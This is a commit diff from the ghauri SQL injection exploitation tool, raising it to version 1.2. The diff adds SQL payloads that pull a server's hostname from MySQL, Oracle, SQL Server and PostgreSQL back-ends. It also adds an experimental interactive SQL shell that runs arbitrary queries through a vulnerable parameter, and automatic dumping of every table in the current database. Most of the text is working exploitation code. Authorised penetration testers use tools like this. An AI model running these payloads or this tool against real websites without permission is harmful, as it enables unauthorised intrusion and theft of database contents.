Projects STRLCPY ghauri Commits 98eb7483
🤬
  • ■ ■ ■ ■ ■
    README.md
    1  -[![GitHub release](https://img.shields.io/badge/release-v1.1.9-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.9)
     1 +[![GitHub release](https://img.shields.io/badge/release-v1.2-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.2)
    2 2  [![GitHub stars](https://img.shields.io/github/stars/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/stargazers)
    3 3  [![GitHub forks](https://img.shields.io/github/forks/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/network)
    4 4  [![GitHub issues](https://img.shields.io/github/issues/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/issues)
    skipped 48 lines
    53 53   - added support for skip urlencoding switch: `--skip-urlencode`
    54 54   - added support to verify extracted characters in case of boolean/time based injections.
    55 55   - added support for handling redirects on user demand.
     56 + - added support for sql-shell switch: `--sql-shell` (experimental)
     57 + - added support for fresh queries switch: `--fresh-queries`
     58 + - added switch for hostname extraction: `--hostname`
    56 59   
    57 60   
    58 61  ## **Advanced Usage**
    skipped 11 lines
    70 73   -v VERBOSE Verbosity level: 1-5 (default 1).
    71 74   --batch Never ask for user input, use the default behavior
    72 75   --flush-session Flush session files for current target
     76 + --fresh-queries Ignore query results stored in session file
     77 + --test-filter Select test payloads by titles (experimental)
    73 78   
    74 79  Target:
    75 80   At least one of these options has to be provided to define the
    skipped 70 lines
    146 151   -C COLS DBMS database table column(s) to enumerate
    147 152   --start Retrieve entries from offset for dbs/tables/columns/dump
    148 153   --stop Retrieve entries till offset for dbs/tables/columns/dump
     154 + --sql-shell Prompt for an interactive SQL shell (experimental)
    149 155   
    150 156  Example:
    151  - ghauri http://www.site.com/vuln.php?id=1 --dbs
     157 + ghauri -u http://www.site.com/vuln.php?id=1 --dbs
     158 + 
     159 + 
    152 160  </code></pre>
    153 161   
    154 162   
    skipped 10 lines
  • ■ ■ ■ ■
    ghauri/__init__.py
    skipped 23 lines
    24 24   
    25 25  """
    26 26   
    27  -__version__ = "1.1.9"
     27 +__version__ = "1.2"
    28 28  __author__ = "Nasir Khan (r0ot h3x49)"
    29 29  __license__ = "MIT"
    30 30  __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
    skipped 2 lines
  • ■ ■ ■ ■ ■
    ghauri/common/config.py
    skipped 105 lines
    106 106   self._bool_ctt = None
    107 107   self._bool_ctf = None
    108 108   self._match_ratio_check = False
     109 + self.fresh_queries = False
    109 110   
    110 111   @property
    111 112   def session_filepath(self):
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/payloads.py
    skipped 165 lines
    166 166   "PostgreSQL": ["CURRENT_SCHEMA()", "(SELECT current_database())"],
    167 167  }
    168 168   
    169  -# PAYLOADS_HOSTNAME = [
    170  -# "@@HOSTNAME",
    171  -# "HOST_NAME()",
    172  -# "(SELECT+CONCAT(boot_val)+FROM+pg_settings WHERE name='listen_addresses' GROUP BY boot_val)",
    173  -# ]
     169 +PAYLOADS_HOSTNAME = {
     170 + "MySQL": [
     171 + "@@HOSTNAME",
     172 + ],
     173 + "Oracle": [
     174 + "(SELECT UTL_INADDR.GET_HOST_NAME FROM DUAL)",
     175 + "(SELECT host_name FROM v$instance)",
     176 + ],
     177 + "Microsoft SQL Server": ["@@SERVERNAME", "HOST_NAME()", "(SELECT HOST_NAME())"],
     178 + "PostgreSQL": [
     179 + "(SELECT CONCAT(boot_val) FROM pg_settings WHERE name='listen_addresses' GROUP BY boot_val)",
     180 + "(SELECT inet_server_addr())",
     181 + ],
     182 +}
    174 183   
    175 184  PAYLOADS = {
    176 185   "BooleanTests": {
    skipped 1908 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/core/extract.py
    skipped 1745 lines
    1746 1746   error_msg = None
    1747 1747   retry_on_error = 0
    1748 1748   is_resumed = False
    1749  - retval_session = session.fetchall(
    1750  - session_filepath=conf.session_filepath,
    1751  - query="SELECT * FROM storage WHERE `type`=?",
    1752  - values=(dump_type,),
    1753  - )
    1754  - if retval_session:
    1755  - retval_session = retval_session.pop()
    1756  - is_resumed = True
    1757  - result = retval_session.get("value")
    1758  - length = retval_session.get("length")
    1759  - logger.progress(f"resumed: {result}")
    1760  - last_row_id = retval_session.get("id")
    1761  - if len(result) == length:
    1762  - _temp = PayloadResponse(
    1763  - ok=True,
    1764  - error="",
    1765  - result=result,
    1766  - payload="",
    1767  - resumed=is_resumed,
    1768  - )
    1769  - return _temp
     1749 + if dump_type and not conf.fresh_queries:
     1750 + retval_session = session.fetchall(
     1751 + session_filepath=conf.session_filepath,
     1752 + query="SELECT * FROM storage WHERE `type`=?",
     1753 + values=(dump_type,),
     1754 + )
     1755 + if retval_session:
     1756 + retval_session = retval_session.pop()
     1757 + is_resumed = True
     1758 + result = retval_session.get("value")
     1759 + length = retval_session.get("length")
     1760 + logger.progress(f"resumed: {result}")
     1761 + last_row_id = retval_session.get("id")
     1762 + if len(result) == length:
     1763 + _temp = PayloadResponse(
     1764 + ok=True,
     1765 + error="",
     1766 + result=result,
     1767 + payload="",
     1768 + resumed=is_resumed,
     1769 + )
     1770 + return _temp
    1770 1771   if error_based_in_vectors:
    1771 1772   vector = conf.vectors.get("error_vector")
    1772 1773   while start < end:
    1773  - # if http_firewall_code_counter > 2:
    1774  - # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    1775  - # logger.warning(f"HTTP error code detected during run:")
    1776  - # choice = logger.read_input(
    1777  - # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    1778  - # batch=False,
    1779  - # user_input="C",
    1780  - # )
    1781  - # if choice == "q":
    1782  - # logger.error("user quit")
    1783  - # logger.end("ending")
    1784  - # exit(0)
    1785  - # if choice == "c":
    1786  - # http_firewall_code_counter = 0
    1787  - # if retry_on_error >= retry:
    1788  - # logger.warning(f"Ghauri detected connection errors multiple times")
    1789  - # choice = logger.read_input(
    1790  - # f"how do you want to proceed? [(C)continue/(q)uit] ",
    1791  - # batch=False,
    1792  - # user_input="C",
    1793  - # )
    1794  - # if choice == "q":
    1795  - # logger.error("user quit")
    1796  - # logger.end("ending")
    1797  - # exit(0)
    1798  - # if choice == "c":
    1799  - # retry_on_error = 0
    1800 1774   entry = payloads[start]
    1801 1775   response_string = ""
    1802 1776   if delay > 0:
    skipped 92 lines
    1895 1869   "it was not possible to count the number of entries for the SQL query provided. Ghauri will assume that it returns only one entry"
    1896 1870   )
    1897 1871   try:
    1898  - if dump_type:
     1872 + if dump_type and not conf.fresh_queries:
    1899 1873   session.dump(
    1900 1874   session_filepath=conf.session_filepath,
    1901 1875   query=STORAGE,
    skipped 112 lines
    2014 1988   is_resumed = False
    2015 1989   start_pos = 1
    2016 1990   start_chars = ""
    2017  - if dump_type:
     1991 + if dump_type and not conf.fresh_queries:
    2018 1992   retval_session = session.fetchall(
    2019 1993   session_filepath=conf.session_filepath,
    2020 1994   query="SELECT * FROM storage WHERE `type`=?",
    skipped 51 lines
    2072 2046   ok=True, error="", result="", payload=length, resumed=False
    2073 2047   )
    2074 2048   try:
    2075  - if not is_resumed and dump_type:
     2049 + if not is_resumed and dump_type and not conf.fresh_queries:
    2076 2050   last_row_id = session.dump(
    2077 2051   session_filepath=conf.session_filepath,
    2078 2052   query=STORAGE,
    skipped 162 lines
    2241 2215   conf._thread_chars_query = {}
    2242 2216   with conf.lock:
    2243 2217   try:
    2244  - if dump_type and chars:
     2218 + if (
     2219 + dump_type
     2220 + and chars
     2221 + and not conf.fresh_queries
     2222 + ):
    2245 2223   session.dump(
    2246 2224   session_filepath=conf.session_filepath,
    2247 2225   query=STORAGE_UPDATE,
    skipped 280 lines
    2528 2506   "it seems the current payload is filtered out by some sort of WAF/IDS."
    2529 2507   )
    2530 2508   break
    2531  - if dump_type and chars:
     2509 + if (
     2510 + dump_type
     2511 + and chars
     2512 + and not conf.fresh_queries
     2513 + ):
    2532 2514   session.dump(
    2533 2515   session_filepath=conf.session_filepath,
    2534 2516   query=STORAGE_UPDATE,
    skipped 206 lines
    2741 2723   "it seems the current payload is filtered out by some sort of WAF/IDS."
    2742 2724   )
    2743 2725   break
    2744  - if dump_type and chars:
     2726 + if (
     2727 + dump_type
     2728 + and chars
     2729 + and not conf.fresh_queries
     2730 + ):
    2745 2731   session.dump(
    2746 2732   session_filepath=conf.session_filepath,
    2747 2733   query=STORAGE_UPDATE,
    skipped 53 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/extractor/common.py
    skipped 35 lines
    36 36   PAYLOADS_TBLS_COUNT,
    37 37   PAYLOADS_COLS_COUNT,
    38 38   PAYLOADS_RECS_COUNT,
     39 + PAYLOADS_HOSTNAME,
    39 40  )
    40 41   
    41 42  from ghauri.common.lib import collections
    skipped 171 lines
    213 214   else:
    214 215   logger.info("retrieved: '%s'" % (retval.result))
    215 216   logger.success(f"current user: '{retval.result}'")
     217 + else:
     218 + error = retval.error
     219 + if error:
     220 + message = f"Ghauri detected an error during current user extraction ({error})"
     221 + logger.warning(f"{message}")
     222 + logger.end("ending")
     223 + exit(0)
     224 + else:
     225 + retval = guess
     226 + return retval
     227 + 
     228 + def fetch_hostname(
     229 + self,
     230 + url,
     231 + data,
     232 + vector,
     233 + parameter,
     234 + headers,
     235 + base,
     236 + injection_type,
     237 + backend="",
     238 + proxy=None,
     239 + is_multipart=False,
     240 + timeout=30,
     241 + delay=0,
     242 + timesec=5,
     243 + attack=None,
     244 + match_string=None,
     245 + not_match_string=None,
     246 + code=None,
     247 + text_only=False,
     248 + ):
     249 + logger.info("fetching hostname")
     250 + Response = collections.namedtuple(
     251 + "Response",
     252 + ["ok", "error", "result", "payload"],
     253 + )
     254 + guess = ghauri_extractor.fetch_characters(
     255 + url=url,
     256 + data=data,
     257 + vector=vector,
     258 + parameter=parameter,
     259 + headers=headers,
     260 + base=base,
     261 + injection_type=injection_type,
     262 + payloads=PAYLOADS_HOSTNAME.get(backend),
     263 + backend=backend,
     264 + proxy=proxy,
     265 + is_multipart=is_multipart,
     266 + timeout=timeout,
     267 + delay=delay,
     268 + timesec=timesec,
     269 + attack01=attack,
     270 + match_string=match_string,
     271 + not_match_string=not_match_string,
     272 + code=code,
     273 + query_check=True,
     274 + text_only=text_only,
     275 + )
     276 + if guess.ok:
     277 + logger.debug(f"working payload found: '{guess.payload}'")
     278 + retval = ghauri_extractor.fetch_characters(
     279 + url=url,
     280 + data=data,
     281 + vector=vector,
     282 + parameter=parameter,
     283 + headers=headers,
     284 + base=base,
     285 + injection_type=injection_type,
     286 + payloads=[guess.payload],
     287 + backend=backend,
     288 + proxy=proxy,
     289 + is_multipart=is_multipart,
     290 + timeout=timeout,
     291 + delay=delay,
     292 + timesec=timesec,
     293 + attack01=attack,
     294 + match_string=match_string,
     295 + not_match_string=not_match_string,
     296 + code=code,
     297 + text_only=text_only,
     298 + dump_type="hostname",
     299 + )
     300 + if retval.ok:
     301 + if retval.resumed:
     302 + logger.info("resumed: '%s'" % (retval.result))
     303 + else:
     304 + logger.info("retrieved: '%s'" % (retval.result))
     305 + logger.success(f"hostname: '{retval.result}'")
    216 306   else:
    217 307   error = retval.error
    218 308   if error:
    skipped 100 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/ghauri.py
    skipped 29 lines
    30 30  from ghauri.core.extract import ghauri_extractor
    31 31  from ghauri.logger.colored_logger import logger, set_level
    32 32  from ghauri.core.tests import basic_check, check_injections
     33 +from ghauri.core.extract import ghauri_extractor as ge
    33 34  from ghauri.common.lib import (
    34 35   os,
    35 36   re,
    skipped 54 lines
    90 91   safe_chars=None,
    91 92   fetch_using=None,
    92 93   test_filter=None,
     94 + sql_shell=False,
     95 + fresh_queries=False,
    93 96  ):
    94 97   verbose_levels = {
    95 98   1: logging.INFO,
    skipped 9 lines
    105 108   conf.timesec = timesec
    106 109   conf.fetch_using = fetch_using
    107 110   conf.test_filter = test_filter
     111 + conf.fresh_queries = fresh_queries
    108 112   logger.start("starting")
    109 113   if not force_ssl:
    110 114   ssl._create_default_https_context = ssl._create_unverified_context
    skipped 315 lines
    426 430   )
    427 431   logger.end("ending")
    428 432   exit(1)
    429  - return GhauriResponse(
    430  - url=url,
    431  - data=data,
    432  - vector=vector,
    433  - backend=backend,
    434  - parameter=parameter,
    435  - headers=full_headers,
    436  - base=base,
    437  - injection_type=injection_type,
    438  - proxy=proxy,
    439  - filepaths=filepaths,
    440  - is_injected=True,
    441  - is_multipart=is_multipart,
    442  - attack=attack,
    443  - match_string=match_string,
    444  - vectors=vectors,
    445  - code=code if code != 200 else None,
    446  - not_match_string=None,
    447  - text_only=conf.text_only,
    448  - )
     433 + if sql_shell:
     434 + logger.info(
     435 + "calling MySQL shell. To quit type 'x' or 'q' and press ENTER"
     436 + )
     437 + while True:
     438 + choice = logger.read_input("sql-shell> ")
     439 + if choice:
     440 + if choice.lower() in ["x", "q"]:
     441 + break
     442 + logger.info(f"fetching SQL query output: '{choice}'")
     443 + retval = ghauri_extractor.fetch_characters(
     444 + url=url,
     445 + data=data,
     446 + vector=vector,
     447 + parameter=parameter,
     448 + headers=full_headers,
     449 + base=base,
     450 + injection_type=injection_type,
     451 + payloads=[choice],
     452 + backend=backend,
     453 + proxy=proxy,
     454 + is_multipart=is_multipart,
     455 + timeout=timeout,
     456 + delay=delay,
     457 + timesec=timesec,
     458 + attack01=attack,
     459 + match_string=match_string,
     460 + not_match_string=None,
     461 + code=code if code != 200 else None,
     462 + text_only=conf.text_only,
     463 + dump_type=choice,
     464 + )
     465 + if retval.ok:
     466 + if retval.resumed:
     467 + logger.info("resumed: '%s'" % (retval.result))
     468 + else:
     469 + logger.info("retrieved: '%s'" % (retval.result))
     470 + logger.success(f"{choice}: '{retval.result}'")
     471 + logger.info(
     472 + f"fetched data logged to text files under: '{filepaths.filepath}'"
     473 + )
     474 + logger.end("ending")
     475 + exit(0)
     476 + else:
     477 + return GhauriResponse(
     478 + url=url,
     479 + data=data,
     480 + vector=vector,
     481 + backend=backend,
     482 + parameter=parameter,
     483 + headers=full_headers,
     484 + base=base,
     485 + injection_type=injection_type,
     486 + proxy=proxy,
     487 + filepaths=filepaths,
     488 + is_injected=True,
     489 + is_multipart=is_multipart,
     490 + attack=attack,
     491 + match_string=match_string,
     492 + vectors=vectors,
     493 + code=code if code != 200 else None,
     494 + not_match_string=None,
     495 + text_only=conf.text_only,
     496 + )
    449 497   # end of injection
    450 498   logger.critical("all tested parameters do not appear to be injectable.")
    451 499   logger.end("ending")
    skipped 68 lines
    520 568   self._code = code
    521 569   self._text_only = text_only
    522 570   
    523  - def __end(self, database="", table="", fetched=True):
     571 + def _end(self, database="", table="", fetched=True):
    524 572   new_line = ""
    525 573   if database and table:
    526 574   filepath = os.path.join(conf.filepaths.filepath, "dump")
    skipped 30 lines
    557 605   text_only=self._text_only,
    558 606   )
    559 607   fetched = response.ok
    560  - if fetched:
    561  - logger.success("")
    562  - self.__end(fetched=fetched)
     608 + # if fetched:
     609 + # logger.success("")
    563 610   return response
    564 611   
    565 612   def extract_hostname(self):
    skipped 18 lines
    584 631   text_only=self._text_only,
    585 632   )
    586 633   fetched = response.ok
    587  - if fetched:
    588  - logger.success("")
    589  - self.__end(fetched=fetched)
     634 + # if fetched:
     635 + # logger.success("")
    590 636   return response
    591 637   
    592 638   def extract_current_db(self):
    skipped 18 lines
    611 657   text_only=self._text_only,
    612 658   )
    613 659   fetched = response.ok
    614  - if fetched:
    615  - logger.success("")
    616  - self.__end(fetched=fetched)
     660 + # if fetched:
     661 + # logger.success("")
    617 662   return response
    618 663   
    619 664   def extract_current_user(self):
    skipped 18 lines
    638 683   text_only=self._text_only,
    639 684   )
    640 685   fetched = response.ok
    641  - if fetched:
    642  - logger.success("")
    643  - self.__end(fetched=fetched)
     686 + # if fetched:
     687 + # logger.success("")
    644 688   return response
    645 689   
    646 690   def extract_dbs(self, start=0, stop=None):
    skipped 22 lines
    669 713   fetched = response.ok
    670 714   if not fetched:
    671 715   response = self.extract_current_db()
    672  - if fetched:
    673  - logger.success("")
    674  - self.__end(fetched=fetched)
     716 + # if fetched:
     717 + # logger.success("")
    675 718   return response
    676 719   
    677 720   def extract_tables(self, database="", start=0, stop=None, dump_requested=False):
    skipped 21 lines
    699 742   database=database,
    700 743   )
    701 744   fetched = response.ok
    702  - if fetched:
    703  - logger.success("")
    704  - else:
    705  - logger.error("unable to retrieve the table names for any database")
    706  - print("\n")
    707  - if not dump_requested:
    708  - self.__end(fetched=True)
     745 + # if not fetched:
     746 + # logger.success("")
     747 + # else:
     748 + # logger.error("unable to retrieve the table names for any database")
     749 + # print("\n")
    709 750   return response
    710 751   
    711 752   def extract_columns(
    skipped 24 lines
    736 777   table=table,
    737 778   )
    738 779   fetched = response.ok
    739  - if fetched:
    740  - logger.success("")
    741  - if not dump_requested:
    742  - self.__end(fetched=fetched)
     780 + # if fetched:
     781 + # logger.success("")
    743 782   return response
    744 783   
    745 784   def extract_records(
    skipped 33 lines
    779 818   fetched = response.ok
    780 819   if fetched:
    781 820   if not dump_requested:
    782  - logger.success("")
    783  - self.__end(database=database, table=table, fetched=fetched)
    784  - else:
    785  - if not dump_requested:
    786  - self.__end(fetched=fetched)
     821 + # logger.success("")
     822 + self._end(database=database, table=table, fetched=False)
    787 823   return response
    788 824   
    789 825   def dump_database(self, database="", start=0, stop=None, dump_requested=False):
    skipped 22 lines
    812 848   dump_requested=dump_requested,
    813 849   )
    814 850   if retval_dump.ok:
    815  - self.__end(database=database, table=table, fetched=False)
    816  - self.__end(fetched=True)
     851 + self._end(database=database, table=table, fetched=False)
    817 852   
    818 853   def dump_table(
    819 854   self, database="", table="", start=0, stop=None, dump_requested=False
    skipped 15 lines
    835 870   dump_requested=dump_requested,
    836 871   )
    837 872   if retval_dump.ok:
    838  - self.__end(database=database, table=table, fetched=False)
    839  - self.__end(fetched=True)
     873 + self._end(database=database, table=table, fetched=False)
     874 + 
     875 + def dump_current_db(
     876 + self, database="", start=0, stop=None, current_db=None, dump_requested=False
     877 + ):
     878 + logger.warning(
     879 + "missing database parameter. Ghauri is going to use the current database to enumerate table(s) entries"
     880 + )
     881 + if not current_db:
     882 + retval_current_db = self.extract_current_db()
     883 + if retval_current_db.ok:
     884 + current_db = retval_current_db.result.strip()
     885 + if current_db:
     886 + retval_tables = self.extract_tables(
     887 + database=current_db,
     888 + start=start,
     889 + stop=stop,
     890 + dump_requested=dump_requested,
     891 + )
     892 + if retval_tables.ok:
     893 + for table in retval_tables.result:
     894 + retval_columns = self.extract_columns(
     895 + database=current_db,
     896 + table=table,
     897 + start=start,
     898 + stop=stop,
     899 + dump_requested=dump_requested,
     900 + )
     901 + if retval_columns.ok:
     902 + retval_dump = self.extract_records(
     903 + database=current_db,
     904 + table=table,
     905 + columns=",".join(list(retval_columns.result)),
     906 + start=start,
     907 + stop=stop,
     908 + dump_requested=dump_requested,
     909 + )
     910 + if retval_dump.ok:
     911 + self._end(database=current_db, table=table, fetched=False)
     912 + else:
     913 + logger.error(
     914 + "Ghauri is expecting database name to enumerate table(s) entries."
     915 + )
    840 916   
  • ■ ■ ■ ■ ■ ■
    ghauri/scripts/ghauri.py
    skipped 64 lines
    65 65   help="Flush session files for current target",
    66 66   )
    67 67   general.add_argument(
     68 + "--fresh-queries",
     69 + dest="fresh_queries",
     70 + action="store_true",
     71 + help="Ignore query results stored in session file",
     72 + )
     73 + general.add_argument(
    68 74   "--test-filter",
    69 75   dest="test_filter",
    70 76   type=str,
    skipped 345 lines
    416 422   default=None,
    417 423   metavar="",
    418 424   )
     425 + enumeration.add_argument(
     426 + "--sql-shell",
     427 + dest="sql_shell",
     428 + action="store_true",
     429 + help="Prompt for an interactive SQL shell (experimental)",
     430 + )
    419 431   examples = parser.add_argument_group("Example", description=examples)
    420 432   
    421 433   args = parser.parse_args()
    skipped 41 lines
    463 475   safe_chars=args.safe_chars,
    464 476   fetch_using=args.fetch_using,
    465 477   test_filter=args.test_filter,
     478 + sql_shell=args.sql_shell,
     479 + fresh_queries=args.fresh_queries,
    466 480   )
    467 481   if resp.is_injected:
    468 482   target = ghauri.Ghauri(
    skipped 15 lines
    484 498   match_string=resp.match_string,
    485 499   vectors=resp.vectors,
    486 500   )
    487  - if not args.dbs and (
    488  - args.hostname or args.current_user or args.current_db or args.banner
    489  - ):
    490  - if args.banner:
    491  - target.extract_banner()
    492  - if args.current_user:
    493  - target.extract_current_user()
    494  - if args.current_db:
    495  - target.extract_current_db()
    496  - if args.hostname:
    497  - target.extract_hostname()
     501 + current_db = None
     502 + if args.banner:
     503 + target.extract_banner()
     504 + if args.current_user:
     505 + target.extract_current_user()
     506 + if args.current_db:
     507 + response = target.extract_current_db()
     508 + current_db = response.result.strip() if response.ok else None
     509 + if args.hostname:
     510 + target.extract_hostname()
    498 511   if args.dbs:
    499 512   target.extract_dbs(start=args.limitstart, stop=args.limitstop)
    500 513   if args.db and args.tables:
    skipped 22 lines
    523 536   stop=args.limitstop,
    524 537   dump_requested=True,
    525 538   )
    526  - 
    527 539   if args.db and args.tbl and args.dump and not args.cols:
    528 540   target.dump_table(
    529 541   database=args.db,
    skipped 2 lines
    532 544   stop=args.limitstop,
    533 545   dump_requested=True,
    534 546   )
     547 + if args.dump and not args.db and not args.tbl and not args.cols:
     548 + target.dump_current_db(current_db=current_db, dump_requested=True)
     549 + logger.success("")
     550 + target._end()
    535 551   
    536 552   
    537 553  if __name__ == "__main__":
    skipped 2 lines
  • ■ ■ ■ ■
    setup.py
    skipped 4 lines
    5 5   
    6 6  setup(
    7 7   name="ghauri",
    8  - version="1.1.9",
     8 + version="1.2",
    9 9   description="An advanced SQL injection detection & exploitation tool.",
    10 10   classifiers=["Programming Language :: Python3"],
    11 11   author="Nasir Khan",
    skipped 28 lines
Please wait...
Page is in error, reload to recover